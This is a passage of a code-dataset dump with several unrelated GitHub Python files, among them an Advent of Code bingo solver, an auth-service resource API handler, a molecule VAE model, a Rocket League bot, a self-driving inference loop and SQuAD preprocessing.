entry.append(val)\n self.unhit_total += val\n self.entries.append(entry)\n self.col_hit.append(0)\n self.row_hit.append(0)\n\n def call(self, N):\n \"\"\" Returns (hit, score)\"\"\"\n if self.done:\n # Don't continue once won: needed for part B\n return (False, 0)\n for col in range(0, Board.board_size):\n for row in range(0, Board.board_size):\n if self.entries[col][row] == N:\n self.col_hit[col] += 1\n self.row_hit[row] += 1\n self.unhit_total -= N\n if (\n self.col_hit[col] == Board.board_size\n or self.row_hit[row] == 
Board.board_size\n ):\n self.done = True\n return (True, self.unhit_total * N)\n return (False, 0)\n\n\ndef part_a(input, part_b=False):\n generator = input_generator(input)\n numbers = next(generator)\n _ = next(generator) # blank\n boards = []\n lines = []\n for line in generator:\n lines.append(line)\n if len(lines) == 5:\n boards.append(Board(lines))\n lines = []\n # No blank line at end\n try:\n _ = next(generator) # blank\n except StopIteration:\n break\n words = numbers.split(\",\")\n boards_done = 0\n for word in words:\n N = int(word)\n for board in boards:\n (result, score) = board.call(N)\n if result:\n boards_done += 1\n if part_b == False:\n if boards_done == 1:\n return score\n else:\n if boards_done == len(boards):\n return score\n assert 0, \"no bingo\"\n\n\ndef part_b(input):\n return part_a(input, True)\n\n\nif __name__ == \"__main__\":\n Run_2021_04().run_cmdline()\n","repo_name":"colinroybell/aoc-py","sub_path":"src/aoc2021/day04.py","file_name":"day04.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30977288563","text":"import logging\nimport re\n\nimport aiohttp.web\nimport asab\nimport asab.web.rest\n\nfrom seacatauth.decorators import access_control\n\n#\n\nL = logging.getLogger(__name__)\n\n#\n\n\nclass ResourceHandler(object):\n\t\"\"\"\n\tResource management\n\n\t---\n\ttags: [\"Resource management\"]\n\t\"\"\"\n\n\tdef __init__(self, app, rbac_svc):\n\t\tself.RBACService = rbac_svc\n\t\tself.ResourceService = app.get_service(\"seacatauth.ResourceService\")\n\n\t\tweb_app = app.WebContainer.WebApp\n\t\tweb_app.router.add_get(\"/resource\", self.list)\n\t\tweb_app.router.add_get(\"/resource/{resource_id}\", self.get)\n\t\tweb_app.router.add_post(\"/resource/{resource_id}\", self.create_or_undelete)\n\t\tweb_app.router.add_put(\"/resource/{resource_id}\", self.update)\n\t\tweb_app.router.add_delete(\"/resource/{resource_id}\", self.delete)\n\n\n\t@access_control(\"seacat:resource:access\")\n\tasync def list(self, request):\n\t\t\"\"\"\n\t\tList resources\n\n\t\t---\n\t\tparameters:\n\t\t-\tname: p\n\t\t\tin: query\n\t\t\tdescription: Page number\n\t\t\tschema:\n\t\t\t\ttype: integer\n\t\t-\tname: i\n\t\t\tin: query\n\t\t\tdescription: Items per page\n\t\t\tschema:\n\t\t\t\ttype: integer\n\t\t-\tname: f\n\t\t\tin: query\n\t\t\tdescription: Filter string\n\t\t\tschema:\n\t\t\t\ttype: string\n\t\t-\tname: exclude\n\t\t\tin: query\n\t\t\tdescription:\n\t\t\t\tExclude resources based on their type/status. 
If omitted, this parameter defaults\n\t\t\t\tto `exclude=deleted`, which means the results include all active resources.\n\t\t\trequired: false\n\t\t\texplode: false\n\t\t\tschema:\n\t\t\t\ttype: array\n\t\t\t\titems:\n\t\t\t\t\tenum: [\"active\", \"deleted\", \"globalonly\"]\n\t\t\"\"\"\n\t\tpage = int(request.query.get(\"p\", 1)) - 1\n\t\tlimit = request.query.get(\"i\", None)\n\t\tif limit is not None:\n\t\t\tlimit = int(limit)\n\n\t\t# Filter by ID.startswith()\n\t\tquery_filter = {}\n\t\tif \"f\" in request.query:\n\t\t\tquery_filter[\"_id\"] = {\"$regex\": \"^{}\".format(re.escape(request.query[\"f\"]))}\n\n\t\t# Get the types of resources to exclude from the results\n\t\t# By default, exclude only deleted resources\n\t\texclude = request.query.get(\"exclude\", \"\")\n\t\tif len(exclude) == 0:\n\t\t\texclude = \"deleted\"\n\t\texclude = exclude.split(\",\")\n\t\tif \"deleted\" in exclude:\n\t\t\tif \"active\" in exclude:\n\t\t\t\treturn asab.web.rest.json_response(request, {\"data\": [], \"count\": 0})\n\t\t\telse:\n\t\t\t\tquery_filter[\"deleted\"] = {\"$in\": [None, False]}\n\t\telse:\n\t\t\tif \"active\" in exclude:\n\t\t\t\tquery_filter[\"deleted\"] = True\n\t\t\telse:\n\t\t\t\tpass\n\n\t\tif \"globalonly\" in exclude:\n\t\t\tif \"_id\" not in query_filter:\n\t\t\t\tquery_filter[\"_id\"] = {}\n\t\t\tquery_filter[\"_id\"][\"$nin\"] = list(self.ResourceService.GlobalOnlyResources)\n\n\t\tresources = await self.ResourceService.list(page, limit, query_filter)\n\t\treturn asab.web.rest.json_response(request, resources)\n\n\n\t@access_control(\"seacat:resource:access\")\n\tasync def get(self, request):\n\t\t\"\"\"\n\t\tGet resource detail\n\t\t\"\"\"\n\t\tresource_id = request.match_info[\"resource_id\"]\n\t\tresult = await self.ResourceService.get(resource_id)\n\t\treturn asab.web.rest.json_response(\n\t\t\trequest, result\n\t\t)\n\n\n\t@asab.web.rest.json_schema_handler({\n\t\t\"type\": \"object\",\n\t\t\"additionalProperties\": False,\n\t\t\"properties\": {\n\t\t\t\"description\": {\"type\": \"string\"}}\n\t})\n\t@access_control(\"seacat:resource:edit\")\n\tasync def create_or_undelete(self, request, *, json_data):\n\t\t\"\"\"\n\t\tCreate a new resource or undelete a resource that has been soft-deleted\n\t\t\"\"\"\n\t\tresource_id = request.match_info[\"resource_id\"]\n\n\t\ttry:\n\t\t\tresource = await self.ResourceService.get(resource_id)\n\t\t\t# Resource exists: can it be undeleted?\n\t\t\tif resource.get(\"deleted\") in [None, False]:\n\t\t\t\traise asab.exceptions.Conflict(\"Resource already exists.\", key=\"_id\", value=resource_id)\n\t\t\tundelete = True\n\t\texcept KeyError:\n\t\t\tundelete = False\n\n\t\tif undelete:\n\t\t\tawait self.ResourceService.undelete(resource_id)\n\t\telse:\n\t\t\tawait self.ResourceService.create(resource_id, json_data.get(\"description\"))\n\t\treturn asab.web.rest.json_response(request, {\"result\": \"OK\"})\n\n\n\t@asab.web.rest.json_schema_handler({\n\t\t\"type\": \"object\",\n\t\t\"additionalProperties\": False,\n\t\t\"properties\": {\n\t\t\t\"name\": {\"type\": \"string\"},\n\t\t\t\"description\": {\"type\": \"string\"},\n\t\t}\n\t})\n\t@access_control(\"seacat:resource:edit\")\n\tasync def update(self, request, *, json_data):\n\t\t\"\"\"\n\t\tUpdate resource description or rename resource\n\t\t\"\"\"\n\t\tresource_id = request.match_info[\"resource_id\"]\n\t\tif \"description\" in json_data:\n\t\t\tawait self.ResourceService.update(resource_id, json_data[\"description\"])\n\t\tif \"name\" in json_data and json_data[\"name\"] != 
resource_id:\n\t\t\t# TODO: Renaming should be on a separate endpoint\n\t\t\tawait self.ResourceService.rename(resource_id, json_data[\"name\"])\n\n\t\treturn asab.web.rest.json_response(request, {\"result\": \"OK\"})\n\n\n\t@access_control(\"seacat:resource:edit\")\n\tasync def delete(self, request, *, credentials_id):\n\t\t\"\"\"\n\t\tDelete resource\n\n\t\tThe resource is soft-deleted (suspended) by default.\n\n\t\t---\n\t\tparameters:\n\t\t-\tname: hard_delete\n\t\t\tin: query\n\t\t\tdescription:\n\t\t\t\tBy default, the resource is only soft-deleted, i.e. marked as deleted and retained in the database.\n\t\t\t\tEnabling this switch causes the resource to be completely removed from the database.\n\t\t\t\tHard-deleting requires `authz:superuser`.\n\t\t\trequired: false\n\t\t\tschema:\n\t\t\t\ttype: boolean\n\t\t\t\tenum: [\"true\"]\n\t\t\"\"\"\n\t\tresource_id = request.match_info[\"resource_id\"]\n\t\thard_delete = request.query.get(\"hard_delete\") == \"true\"\n\t\tif hard_delete and not request.is_superuser:\n\t\t\tL.log(asab.LOG_NOTICE, \"Cannot hard-delete resources without superuser rights\", struct_data={\n\t\t\t\t\"cid\": credentials_id, \"resource\": resource_id})\n\t\t\treturn aiohttp.web.HTTPForbidden()\n\t\tawait self.ResourceService.delete(resource_id, hard_delete=hard_delete)\n\t\treturn asab.web.rest.json_response(request, {\"result\": \"OK\"})\n","repo_name":"TeskaLabs/seacat-auth","sub_path":"seacatauth/authz/resource/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"8199726872","text":"import torch\nimport torch.nn as nn\nfrom ggpm.encoder import HierMPNEncoder\nfrom ggpm.decoder import HierMPNDecoder\nfrom ggpm.nnutils import *\n\n\ndef make_cuda(tensors):\n tree_tensors, graph_tensors = tensors\n make_tensor = lambda x: x if type(x) is torch.Tensor else torch.tensor(x)\n tree_tensors = [to_cuda(make_tensor(x)).long() for x in tree_tensors[:-1]] + [tree_tensors[-1]]\n graph_tensors = [to_cuda(make_tensor(x)).long() for x in graph_tensors[:-1]] + [graph_tensors[-1]]\n return tree_tensors, graph_tensors\n\nclass HierVAE(nn.Module):\n def __init__(self, args):\n super(HierVAE, self).__init__()\n self.encoder = HierMPNEncoder(args.vocab, args.atom_vocab, args.rnn_type, args.embed_size, args.hidden_size,\n args.depthT, args.depthG, args.dropout)\n self.decoder = HierMPNDecoder(args.vocab, args.atom_vocab, args.rnn_type, args.embed_size, args.hidden_size,\n args.latent_size, args.diterT, args.diterG, args.dropout)\n self.encoder.tie_embedding(self.decoder.hmpn)\n self.latent_size = args.latent_size\n\n self.R_mean = nn.Linear(args.hidden_size, args.latent_size)\n self.R_var = nn.Linear(args.hidden_size, args.latent_size)\n\n # self.T_mean = nn.Linear(args.hidden_size, args.latent_size)\n # self.T_var = nn.Linear(args.hidden_size, args.latent_size)\n\n # self.G_mean = nn.Linear(args.hidden_size, args.latent_size)\n # self.G_var = nn.Linear(args.hidden_size, args.latent_size)\n\n def rsample(self, z_vecs, W_mean, W_var, perturb=True):\n batch_size = z_vecs.size(0)\n z_mean = W_mean(z_vecs)\n z_log_var = -torch.abs(W_var(z_vecs))\n kl_loss = -0.5 * torch.sum(1.0 + z_log_var - z_mean * z_mean - torch.exp(z_log_var)) / batch_size\n epsilon = to_cuda(torch.randn_like(z_mean))\n z_vecs = z_mean + torch.exp(z_log_var / 2) * epsilon if perturb else z_mean\n return z_vecs, kl_loss\n\n def sample(self, batch_size):\n root_vecs = 
to_cuda(torch.randn(batch_size, self.latent_size))\n return self.decoder.decode((root_vecs, root_vecs, root_vecs), greedy=True, max_decode_step=150)\n\n def reconstruct(self, batch):\n mols, graphs, tensors, _, _, _ = batch\n tree_tensors, graph_tensors = tensors = make_cuda(tensors)\n root_vecs, tree_vecs, _, graph_vecs = self.encoder(tree_tensors, graph_tensors)\n\n root_vecs, root_kl = self.rsample(root_vecs, self.R_mean, self.R_var, perturb=False)\n return self.decoder.decode((root_vecs, root_vecs, root_vecs), greedy=True, max_decode_step=150)\n\n def forward(self, mols, graphs, tensors, orders, homos, lumos, beta, perturb_z=True):\n tree_tensors, graph_tensors = tensors = make_cuda(tensors)\n\n root_vecs, tree_vecs, _, graph_vecs = self.encoder(tree_tensors, graph_tensors)\n\n # graph_vecs = stack_pad_tensor( [graph_vecs[st : st + le] for st,le in graph_tensors[-1]] )\n # size = graph_vecs.new_tensor([le for _,le in graph_tensors[-1]])\n # graph_vecs = graph_vecs.sum(dim=1) / size.unsqueeze(-1)\n\n # tree_vecs = stack_pad_tensor( [tree_vecs[st : st + le] for st,le in tree_tensors[-1]] )\n # size = tree_vecs.new_tensor([le for _,le in tree_tensors[-1]])\n # tree_vecs = tree_vecs.sum(dim=1) / size.unsqueeze(-1)\n\n root_vecs, root_kl = self.rsample(root_vecs, self.R_mean, self.R_var, perturb_z)\n # tree_vecs, tree_kl = self.rsample(tree_vecs, self.T_mean, self.T_var, perturb_z)\n # graph_vecs, graph_kl = self.rsample(graph_vecs, self.G_mean, self.G_var, perturb_z)\n kl_div = root_kl # + tree_kl + graph_kl\n\n # modify molecules\n loss, wacc, iacc, tacc, sacc = self.decoder((root_vecs, root_vecs, root_vecs), graphs, tensors, orders)\n\n return loss + beta * kl_div, kl_div.item(), wacc, iacc, tacc, sacc","repo_name":"quocdat32461997/ggpm","sub_path":"ggpm/hpgnn.py","file_name":"hpgnn.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73392295574","text":"import math\n\nfrom rlbot.agents.base_agent import BaseAgent, SimpleControllerState\nfrom rlbot.utils.structures.game_data_struct import GameTickPacket\nfrom rlbot.agents.base_agent import SimpleControllerState\n\nfrom objects import *\nfrom states import *\nfrom util import *\nfrom mlp import brain\n\nimport pygame\nimport pickle\n\n\"\"\"\nRogue Neurons by GooseFairy/ddthj\nPrepared for Professor Stansbury, CS455 and the RLBot community\n\nrogue.py - main file for the bot\n\n\"\"\"\n\n\n\ndef savee(data): #takes any serializable object and writes it into data.dat\n pickle.dump(data, open(\"data.dat\",\"wb\"))\n print(\"saved\")\n \nclass gui: #the gui used when the bot is creating training data\n def __init__(self):\n pygame.init()\n pygame.font.init()\n self.font = pygame.font.SysFont('uh',30)\n self.window = pygame.display.set_mode((500,500))\n self.white = (255,255,255)\n self.cur = 2\n \n def update(self,agent): #returns the current state given by the user & updates the window\n self.window.fill(self.white)\n if self.cur == 1:\n msg = \"shoot\"\n elif self.cur == 2:\n msg = \"contest\"\n elif self.cur == 3:\n msg = \"clear\"\n elif self.cur == 4:\n msg = \"retreat\"\n elif self.cur == 5:\n msg = \"recover\"\n text = self.font.render(msg, False, (0,0,0))\n self.window.blit(text, (250,250))\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n self.cur = 2\n return 2 #contest\n elif event.key == pygame.K_w:\n self.cur = 1\n return 1 #shoot\n elif event.key == 
pygame.K_e:\n self.cur = 3\n return 3 #clear\n elif event.key == pygame.K_r:\n self.cur = 4\n return 4 #retreat\n elif event.key == pygame.K_t:\n self.cur = 5\n return 5 #recover\n elif event.key == pygame.K_p:\n agent.save()\n return self.cur\n\nclass rogue(BaseAgent): #the bot\n def initialize_agent(self): #called by the RLBot Framework automatically after it __init__'s\n\n #objects to hold game information\n self.me = carObject(self.index) \n self.enemy = carObject(not self.index)\n self.ball = ballObject()\n \n #states of our bot\n self.states = [atba(), shoot(), contest(), clear(), retreat(), recover()]\n self.state = self.states[2]\n\n #controller that will be returned to the framework\n self.c = SimpleControllerState()\n\n #Determines what model to use. 0=hardcoded, 1=training mode, 2=play from model\n #Currently configured to play a match with Keras model vs human-made conditional model\n if self.team == 1: \n self.brain = 2 \n else:\n self.brain = 0\n\n #inits components as required\n if self.brain == 1:\n self.gui = gui()\n if self.brain == 2:\n self.model = brain()\n \n #keeps track of match time and time since last jump\n self.time = 0\n self.sinceJump = 9.9\n\n #this is where training data is managed\n self.active = False\n self.sinceSave = 0\n self.trainData = []\n \n def refresh(self): #re-init's our controller to reset all of it's values to defaults\n self.c.__init__()\n return self.c\n\n def save(self): #saves training data\n savee(self.trainData)\n\n def check_state(agent):#this is where the selected model chooses which state the bot (agent) will execute\n\n #the features\n my_time = cap((agent.me.location - agent.ball.location).magnitude() / cap((agent.ball.location - agent.me.location).normalize().dot(agent.me.velocity - agent.ball.velocity), 0.01, 6000),0.01, min(10, (agent.me.location-agent.ball.location).magnitude()/1050))\n enemy_time = cap((agent.enemy.location - agent.ball.location).magnitude() / cap((agent.ball.location - agent.enemy.location).normalize().dot(agent.enemy.velocity - agent.ball.velocity), 0.01, 6000),0.01,min(10, (agent.enemy.location-agent.ball.location).magnitude()/1050))\n my_defense = math.pi - math.acos((agent.ball.location - agent.me.location).normalize().dot((agent.ball.location - Vector3(0,5100*side(agent.team),0)).normalize()))\n enemy_defense = math.pi - math.acos((agent.ball.location - agent.enemy.location).normalize().dot((agent.ball.location - Vector3(0,5100*side(not agent.team),0)).normalize()))\n my_offense = math.pi - math.acos((agent.ball.location - agent.me.location).normalize().dot((Vector3(0,5100*-side(agent.team),0)-agent.ball.location).normalize()))\n enemy_offense = math.pi - math.acos((agent.ball.location - agent.enemy.location).normalize().dot((Vector3(0,5100*-side(not agent.team),0)-agent.ball.location).normalize()))\n ball_ready = True if agent.ball.location[2] < 150 and abs(agent.ball.velocity[2]) < 100 else False\n\n #conditional model \n if agent.brain == 0:\n if agent.me.airborn and agent.sinceJump > 1.4:\n agent.state = agent.states[5] #recover\n elif ((my_time + 0.4 <= enemy_time or enemy_offense < 2.0) and my_offense > 0.75) and ball_ready == True:\n agent.state = agent.states[1] #shoot\n elif ((my_time - 1.0 <= enemy_time) or (enemy_offense < 1.57)) and my_offense > 1.57:\n agent.state = agent.states[2] #contest\n elif (my_offense < 1.57 and enemy_offense > 1.0) and abs(agent.ball.location[0]) < 2000:\n agent.state = agent.states[3] #clear\n else:\n agent.state = agent.states[4] #retreat/collect boost\n #training 
model\n elif agent.brain == 1:\n temp = agent.gui.update(agent)\n agent.state = agent.states[temp]\n if agent.active == True and agent.sinceSave >= 5: #only samples once every 5 frames\n agent.sinceSave = 0\n #all the sample data is divided by its maximum value so that they all land between 0 and 1\n pack = [my_time/10, enemy_time/10, my_defense/3.14, enemy_defense/3.14, my_offense/3.14, enemy_offense/3.14, int(ball_ready),int(agent.me.airborn),temp]\n agent.trainData.append(pack)\n #keras model\n else:\n pack = [my_time/10, enemy_time/10, my_defense/3.14, enemy_defense/3.14, my_offense/3.14, enemy_offense/3.14, int(ball_ready),int(agent.me.airborn)]\n agent.state = agent.states[agent.model.get_state(pack)]\n agent.sinceSave += 1\n \n def get_output(self, packet: GameTickPacket) -> SimpleControllerState: #called by RLBot Framework every tick\n self.process(packet)\n self.check_state()\n return self.state.execute(self)\n\n def process(self,packet): #converts packet information into our internal objects for ease-of-use\n self.sinceJump += packet.game_info.seconds_elapsed-self.time\n self.time = packet.game_info.seconds_elapsed\n self.active = packet.game_info.is_round_active or packet.game_info.is_kickoff_pause\n self.ball.update(packet.game_ball)\n self.me.update(packet.game_cars[self.index])\n self.enemy.update(packet.game_cars[not self.index])\n","repo_name":"ddthj/Rogue-Neurons","sub_path":"rogue.py","file_name":"rogue.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"36496197329","text":"from __future__ import with_statement\n\ntry:\n from setuptools import setup\n extra_options = {\n 'entry_points': {\n 'console_scripts': ['wsgi-proxy = wsgi_proxy.cli:main']\n },\n 'install_requires': ['waitress >= 0.8.2']\n }\nexcept ImportError:\n from distutils.core import setup\n extra_options = {\n 'scripts': 'scripts/wsgi-proxy'\n }\n\nfrom wsgi_proxy.version import VERSION\n\n\ndef readme():\n try:\n with open('README.rst') as f:\n return f.read()\n except IOError:\n pass\n\n\nsetup(\n name='wsgi-proxy',\n version=VERSION,\n description='WSGI proxy application',\n long_description=readme(),\n author='OSAF, Mikeal Rogers',\n author_email='mikeal.rogers' '@' 'gmail.com',\n maintainer='Hong Minhee',\n maintainer_email='minhee' '@' 'dahlia.kr',\n url='https://bitbucket.org/dahlia/wsgi-proxy',\n license='Apache License 2.0',\n packages=['wsgi_proxy'],\n platforms=['Any'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: OS Independent',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n **extra_options\n)\n","repo_name":"shirk3y/pproxy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72451682772","text":"#!/usr/bin/env python2\n\nimport tensorflow as tf\nimport numpy as np\nimport os\n\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.models import load_model\nfrom skimage.io import imread\nfrom sys import argv\n\n# Path to look for images in and record classifications in\nTEMP_PATH = \"/tmp/\"\n\n# Limit the amount of GPU memory the TensorFlow backend will use; out-of-memory error occurs otherwise on the Jetson\nconfig = 
tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.3\nset_session(tf.Session(config=config))\n\n# Load the model twice; for some reason it fails to load correctly the first time on the Jetson\nmodel = load_model(\"./%s\" % argv[1])\nmodel = load_model(\"./%s\" % argv[1])\n\n# Clear old data from the temp folder and record an initial output\nos.system(\"rm %s*sim*\" % TEMP_PATH)\nos.system(\"echo 0.0 > %s-1sim.txt\" % TEMP_PATH)\n\n# Loop forever, classifying images and recording outputs to files\ni = 0\nwhile True:\n # Read from last image plus one (there should not be any gaps)\n path = \"%ssim%d.jpg\" % (TEMP_PATH, i)\n if os.path.isfile(path):\n # Read the file as a 32-bit floating point tensor\n image_raw = imread(path).astype(np.float32)\n\n # Rearrange and crop it into a format that the neural network should accept\n image_3d = np.transpose(image_raw, (1, 0, 2))[60:260, 96:162, :]\n\n # Add an extra dimension (used for batch stacking by Keras)\n image = np.expand_dims(image_3d, 0)\n\n # Classify the image\n steering_angle = model.predict(image)\n\n # Write the classification to a temp file and rename it\n os.system(\"echo %f > %stemp.txt\" % (steering_angle, TEMP_PATH))\n os.system(\"mv %stemp.txt %s%dsim.txt\" % (TEMP_PATH, TEMP_PATH, i))\n\n # Increment the image counter\n i += 1\n","repo_name":"bfmat/SelfDrivingNetwork","sub_path":"infer/jetson_infer.py","file_name":"jetson_infer.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6876604778","text":"import json\nimport sys\n\nfrom tqdm import tqdm\n\nfrom my.corenlp_interface import CoreNLPInterface\n\nin_path = sys.argv[1]\nout_path = sys.argv[2]\nurl = sys.argv[3]\nport = int(sys.argv[4])\ndata = json.load(open(in_path, 'r'))\n\nh = CoreNLPInterface(url, port)\n\n\ndef find_all(a_str, sub):\n start = 0\n while True:\n start = a_str.find(sub, start)\n if start == -1: return\n yield start\n start += len(sub) # use start += 1 to find overlapping matches\n\n\ndef to_hex(s):\n return \" \".join(map(hex, map(ord, s)))\n\n\ndef handle_nobreak(cand, text):\n if cand == text:\n return cand\n if cand.replace(u'\\u00A0', ' ') == text:\n return cand\n elif cand == text.replace(u'\\u00A0', ' '):\n return text\n raise Exception(\"{} '{}' {} '{}'\".format(cand, to_hex(cand), text, to_hex(text)))\n\n\n# resolving unicode complication\n\nwrong_loc_count = 0\nloc_diffs = []\n\nfor article in data['data']:\n for para in article['paragraphs']:\n para['context'] = para['context'].replace(u'\\u000A', '')\n para['context'] = para['context'].replace(u'\\u00A0', ' ')\n context = para['context']\n for qa in para['qas']:\n for answer in qa['answers']:\n answer['text'] = answer['text'].replace(u'\\u00A0', ' ')\n text = answer['text']\n answer_start = answer['answer_start']\n if context[answer_start:answer_start + len(text)] == text:\n if text.lstrip() == text:\n pass\n else:\n answer_start += len(text) - len(text.lstrip())\n answer['answer_start'] = answer_start\n text = text.lstrip()\n answer['text'] = text\n else:\n wrong_loc_count += 1\n text = text.lstrip()\n answer['text'] = text\n starts = list(find_all(context, text))\n if len(starts) == 1:\n answer_start = starts[0]\n elif len(starts) > 1:\n new_answer_start = min(starts, key=lambda s: abs(s - answer_start))\n loc_diffs.append(abs(new_answer_start - answer_start))\n answer_start = new_answer_start\n else:\n raise Exception()\n answer['answer_start'] = answer_start\n\n 
answer_stop = answer_start + len(text)\n answer['answer_stop'] = answer_stop\n assert para['context'][answer_start:answer_stop] == answer['text'], \"{} {}\".format(\n para['context'][answer_start:answer_stop], answer['text'])\n\nprint(wrong_loc_count, loc_diffs)\n\nmismatch_count = 0\ndep_fail_count = 0\nno_answer_count = 0\n\nsize = sum(len(article['paragraphs']) for article in data['data'])\npbar = tqdm(range(size))\n\nfor ai, article in enumerate(data['data']):\n for pi, para in enumerate(article['paragraphs']):\n context = para['context']\n sents = h.split_doc(context)\n words = h.split_sent(context)\n sent_starts = []\n ref_idx = 0\n for sent in sents:\n new_idx = context.find(sent, ref_idx)\n sent_starts.append(new_idx)\n ref_idx = new_idx + len(sent)\n para['sents'] = sents\n para['words'] = words\n para['sent_starts'] = sent_starts\n\n consts = list(map(h.get_const, sents))\n para['consts'] = consts\n deps = list(map(h.get_dep, sents))\n para['deps'] = deps\n\n for qa in para['qas']:\n question = qa['question']\n question_const = h.get_const(question)\n qa['const'] = question_const\n question_dep = h.get_dep(question)\n qa['dep'] = question_dep\n qa['words'] = h.split_sent(question)\n\n for answer in qa['answers']:\n answer_start = answer['answer_start']\n text = answer['text']\n answer_stop = answer_start + len(text)\n # answer_words = h.split_sent(text)\n word_idxs = []\n answer_words = []\n for sent_idx, (sent, sent_start, dep) in enumerate(zip(sents, sent_starts, deps)):\n if dep is None:\n print(\"dep parse failed at {} {} {}\".format(ai, pi, sent_idx))\n dep_fail_count += 1\n continue\n nodes, edges = dep\n words = [node[0] for node in nodes]\n\n for word_idx, (word, _, _, start, _) in enumerate(nodes):\n global_start = sent_start + start\n global_stop = global_start + len(word)\n if answer_start <= global_start < answer_stop or answer_start < global_stop <= answer_stop:\n word_idxs.append((sent_idx, word_idx))\n answer_words.append(word)\n if len(word_idxs) > 0:\n answer['answer_word_start'] = word_idxs[0]\n answer['answer_word_stop'] = word_idxs[-1][0], word_idxs[-1][1] + 1\n if not text.startswith(answer_words[0]):\n print(\"'{}' '{}'\".format(text, ' '.join(answer_words)))\n mismatch_count += 1\n else:\n answer['answer_word_start'] = None\n answer['answer_word_stop'] = None\n no_answer_count += 1\n pbar.update(1)\npbar.close()\n\nprint(mismatch_count, dep_fail_count, no_answer_count)\n\nprint(\"saving...\")\njson.dump(data, open(out_path, 'w'))","repo_name":"allenai/bi-att-flow","sub_path":"squad/aug_squad.py","file_name":"aug_squad.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","stars":1519,"dataset":"github-code","pt":"67"} +{"seq_id":"9969851783","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom myapp.forms import EmployeeForm, EmployeeForm2\nfrom myapp.utils import upload_file\n\n\n\ndef index(req):\n if req.method == 'POST':\n empForm = EmployeeForm(req.POST)\n if empForm.is_valid():\n return HttpResponse(\"good job\")\n else:\n return render(req, 'employee.html', {'form': empForm})\n else:\n emp = EmployeeForm()\n return render(req, \"employee.html\", {\"form\": emp})\n\n\ndef index2(request):\n if request.method == 'POST':\n empForm2 = EmployeeForm2(request.POST, request.FILES)\n if empForm2.is_valid():\n\n # lets do something\n # print (request.FILES['profile_image'])\n upload_file(request.FILES['profile_image'])\n return HttpResponse(\"good 
job\")\n else:\n return render(request, 'index2.html', {'form': empForm2})\n else:\n emp = EmployeeForm2()\n\n return render(request, \"index2.html\", {\"form\": emp})","repo_name":"Sumit21adm/Sumit_Django","sub_path":"Day3/proj1/myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30816649691","text":"\n\"\"\"\n AverageMeter and ProgressMeter are borrowed from the PyTorch Imagenet example:\n https://github.com/pytorch/examples/blob/master/imagenet/main.py\n\"\"\"\nAVERAGE_VAL = 0x08\nAVERAGE_SUM = 0x04\nAVERAGE_AVG = 0x02\nAVERAGE_COUNT = 0x01\nAVERAGE_VAL_AVG = AVERAGE_VAL|AVERAGE_AVG\n\nFMT_E4 = ':.4e'\nFMT_F6 = ':.3f'\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self, name, fmt=':f', mode = AVERAGE_VAL_AVG):\n self.name = name\n self.fmt = fmt\n self.mode = mode\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n \n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def getmodevalue(self):\n if self.mode&AVERAGE_VAL:\n return self.val\n if self.mode&AVERAGE_SUM:\n return self.sum\n if self.mode&AVERAGE_AVG:\n return self.avg\n if self.mode&AVERAGE_COUNT:\n return self.count \n else:\n return 0 \n\n def __str__(self):\n fmtstr = '{name}'\n if self.mode&AVERAGE_VAL:\n fmtstr += ' {val' + self.fmt + '}'\n if self.mode&AVERAGE_SUM:\n fmtstr += ' [{sum' + self.fmt + '}]'\n if self.mode&AVERAGE_AVG:\n fmtstr += ' ({avg' + self.fmt + '})'\n if self.mode&AVERAGE_COUNT:\n fmtstr += ' _{count}_'\n #fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n return fmtstr.format(**self.__dict__)\n\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, *meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def updata(self,num_batches=None,prefix=None):\n if num_batches is not None:\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n if prefix is not None:\n self.prefix = prefix\n\n def print(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n print('\\t'.join(entries), flush=True)\n\n def filelog(self,batch,filename):\n with open(filename,'a') as f:\n f.write(self.getstr(batch)+\"\\n\")\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = '{:' + str(num_digits) + 'd}'\n return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n\n def getstr(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n return 